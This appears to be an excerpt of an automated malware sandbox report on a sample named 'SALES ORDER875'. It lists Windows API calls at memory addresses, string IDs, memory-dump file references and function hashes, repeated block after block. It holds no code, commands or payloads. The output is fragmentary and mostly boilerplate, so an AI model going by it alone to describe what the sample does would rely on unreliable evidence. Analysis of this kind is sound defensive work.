                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 003DD858
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 003DD862
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003DD882
                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 003DD8A3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                    • Opcode ID: ef0b91f703e3b053f35c6ceda32aa6b8447a9a3c2e44e72c0bd5d954ef5ee572
                                                                                                                                                                                    • Instruction ID: a0d32e76612c753a428f06ab91567f1d52ac6bb70c1f8a625999e77b6e1567b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef0b91f703e3b053f35c6ceda32aa6b8447a9a3c2e44e72c0bd5d954ef5ee572
                                                                                                                                                                                    • Instruction Fuzzy Hash: 07E01AB5840204EFCF42AFA0DD486ADBBB6FB08310F20D069E80AE7350C7384902AF54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 003DD86C
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 003DD876
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003DD882
                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 003DD8A3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                    • Opcode ID: 4c9e2f60770cc524070225e976b81a1749f7f42a404c6d9b7ef0da46133f5b80
                                                                                                                                                                                    • Instruction ID: 0313f3b44b9aad7473de22530bfe65bb247feffd72786112bc678f7ca51c7841
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c9e2f60770cc524070225e976b81a1749f7f42a404c6d9b7ef0da46133f5b80
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4E09A75C40204DFCF51AFA0DD486ADBBB5BB18311B149459E94AE7250C73859029F54
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00387620: _wcslen.LIBCMT ref: 00387625
                                                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003F4ED4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                                                                    • String ID: *$LPT
                                                                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                                                                    • Opcode ID: 0a44813e49e808e7570d285762aeec7686221f3b8dae105c0bd14c9ef85f6afb
                                                                                                                                                                                    • Instruction ID: aba414df6d6767ff739e2ba344e5d50692c2eb595e319f758bbd46f97b89f5cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a44813e49e808e7570d285762aeec7686221f3b8dae105c0bd14c9ef85f6afb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54918E75A002089FCB16DF58C484EBABBF5BF45304F198099E90A9F762D735ED85CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 003AE30D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                    • Opcode ID: 3b460f43d605ee62b347dc8b32adddd29669576ae1435d4f2ec0a98df17a1cd1
                                                                                                                                                                                    • Instruction ID: 073b4b962f52e70bc9e27fe72e8846a057a17517c4899e9ddd6d07677a74f096
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b460f43d605ee62b347dc8b32adddd29669576ae1435d4f2ec0a98df17a1cd1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC518161A0C20296CF277714CE013F93B98EF91784F754DACE1D547AE9EB34CC919A46
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharUpperBuffW.USER32(003D569E,00000000,?,0041CC08,?,00000000,00000000), ref: 004078DD
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    • CharUpperBuffW.USER32(003D569E,00000000,?,0041CC08,00000000,?,00000000,00000000), ref: 0040783B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BuffCharUpper$_wcslen
                                                                                                                                                                                    • String ID: <sD
                                                                                                                                                                                    • API String ID: 3544283678-2811456090
                                                                                                                                                                                    • Opcode ID: 0de950a688e85dfd6aec5ddb7a3e03f8e5518153fccb1c984fcbdf00c5bce57f
                                                                                                                                                                                    • Instruction ID: 920de635546476adf6115a5c34c0c57d5d8c6e12743a0caef7a572ab4c38ec1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0de950a688e85dfd6aec5ddb7a3e03f8e5518153fccb1c984fcbdf00c5bce57f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8619F76914219EADF06FBA0CC91DFEB378BF14700B544076E502BB191EF386A06CBA5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                                                    • Opcode ID: b60aaebe9e93315d7ce54b5a398aa73db8603676e8f3215db4527905e91434c6
                                                                                                                                                                                    • Instruction ID: 52158928c227afc2c0b258290c4f702f4502bff3b3b156096e116dfe0a251344
                                                                                                                                                                                    • Opcode Fuzzy Hash: b60aaebe9e93315d7ce54b5a398aa73db8603676e8f3215db4527905e91434c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C510E76900346DFDF1BFF28D481ABA7BA8EF65310F24445AE8919F390D6349D42CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 0039F2A2
                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0039F2BB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                                                    • Opcode ID: 56f21420fba501d787df55d52c692fa35bd138b1e2287119098d71c62da9786a
                                                                                                                                                                                    • Instruction ID: 657a61c5beea99dda4cfe523501fb95d4a04c79f82d4e893896738a117fe20f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56f21420fba501d787df55d52c692fa35bd138b1e2287119098d71c62da9786a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A5158714187449BE321AF10EC86BAFBBF8FF84304F91889DF1D9451A5EB308529CB66
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004057E0
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 004057EC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                                                                                    • Opcode ID: 1ecb5ea01cc482134e33344a2a144abec6543124b7cab2ec7c4cf71297e58de6
                                                                                                                                                                                    • Instruction ID: 92ab6c7f317074647a07a76b1644ae7cd5c3f53e66324bcbf380ee3b8d85a8aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ecb5ea01cc482134e33344a2a144abec6543124b7cab2ec7c4cf71297e58de6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45418131A006099FCB14EFA9C8819BFBBB5EF59310F14816AE905AB391E7349D81CF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003FD130
                                                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003FD13A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                                                                                    • Opcode ID: 945ff81dcbb5f1232b10ba68902529d1c7b8a3e9d47fdaa4de351e78ffa81466
                                                                                                                                                                                    • Instruction ID: ffbbd25e2e794ef8fc2935452b3c0bbd765410e8849e09ba9e96ee6566d3b67c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 945ff81dcbb5f1232b10ba68902529d1c7b8a3e9d47fdaa4de351e78ffa81466
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC313E71D00209ABCF16EFA4CD85EEEBFBAFF05300F000059F915AA162D731AA16DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00413621
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0041365C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                    • Opcode ID: 880c42d360a91b4e5363af1c34d3a63f82543f7a0765a4c6fce3a5aeae7083c2
                                                                                                                                                                                    • Instruction ID: 5ec6870a51c15a5463103ef69fc5e38dd4e1be941fb823e36549292df1a60772
                                                                                                                                                                                    • Opcode Fuzzy Hash: 880c42d360a91b4e5363af1c34d3a63f82543f7a0765a4c6fce3a5aeae7083c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F31AD71100204AEDB20DF28DC80EFB73A9FF88724F10861EF8A597280DA34AD91C768
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0041461F
                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00414634
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                                                    • Opcode ID: a087397f3ea3af71be079cb07d5d8b7e156047ed7501c8cde430f3d13a898756
                                                                                                                                                                                    • Instruction ID: 1e90669475b7bab08d6a9869173e95faa407adee3310fbc4464a9b7b5ecdb134
                                                                                                                                                                                    • Opcode Fuzzy Hash: a087397f3ea3af71be079cb07d5d8b7e156047ed7501c8cde430f3d13a898756
                                                                                                                                                                                    • Instruction Fuzzy Hash: 733119B4A01309AFDB14CFA9C990BDA7BB6FF49304F14406AEA05AB391D774A941CF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003C33A2
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00383A04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                    • String ID: Line:
                                                                                                                                                                                    • API String ID: 2289894680-1585850449
                                                                                                                                                                                    • Opcode ID: 4058bbfe48f63ea6920f8b0c5a53fc4b91ecbea8dd4658cb7fcd000123bbe2d9
                                                                                                                                                                                    • Instruction ID: 961532108aa140e0fc13241d7e6d32d6f70de8c87fc3fb7d97365fdd5568240f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4058bbfe48f63ea6920f8b0c5a53fc4b91ecbea8dd4658cb7fcd000123bbe2d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: E631E571508300AAD322FB10DC55BEF77D8AB40710F1049AEF999871A1EB749A49C7C6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0041327C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00413287
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID: Combobox
                                                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                                                    • Opcode ID: f855ba3368773509efed719027afa02a0cece8bf13d9b356efd0f4b61805faba
                                                                                                                                                                                    • Instruction ID: ffa7961b5685d4eb32d9fb0f5ad55191cc26bde2785c1ae0364929899eb8ecc1
                                                                                                                                                                                    • Opcode Fuzzy Hash: f855ba3368773509efed719027afa02a0cece8bf13d9b356efd0f4b61805faba
                                                                                                                                                                                    • Instruction Fuzzy Hash: B011B2713002087FFF21AF94DC81FFB376AEB983A5F20416AF91897290D6399D918764
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0038600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0038604C
                                                                                                                                                                                      • Part of subcall function 0038600E: GetStockObject.GDI32(00000011), ref: 00386060
                                                                                                                                                                                      • Part of subcall function 0038600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0038606A
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041377A
                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00413794
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                                                    • Opcode ID: b133c94e52656fc0892a32549f80ffb6619594df9d764c55330e719ea79b6b76
                                                                                                                                                                                    • Instruction ID: 02d73c9399d3fd4782bd829849a3f57c93ab3a7c6533c0e9549708e03856d12d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b133c94e52656fc0892a32549f80ffb6619594df9d764c55330e719ea79b6b76
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3113AB2610209AFDF01DFA8CC46EEA7BB8FB08315F004525F965E2250D739E8519B54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003FCD7D
                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003FCDA6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                                                    • Opcode ID: c464cb39bb576476ecbbc1d9f5d3fa35c2d72c13c16a8e15fcce5d74b4a38e18
                                                                                                                                                                                    • Instruction ID: 77099633676d39a1be6dacbc29ca5f3e4fd8e9c141c302cd7844ff5c88ed89ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: c464cb39bb576476ecbbc1d9f5d3fa35c2d72c13c16a8e15fcce5d74b4a38e18
                                                                                                                                                                                    • Instruction Fuzzy Hash: C81106712A163EBAD7354B668C84FFBBEACEF127A4F005236B20983080D3709840D6F0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 004134AB
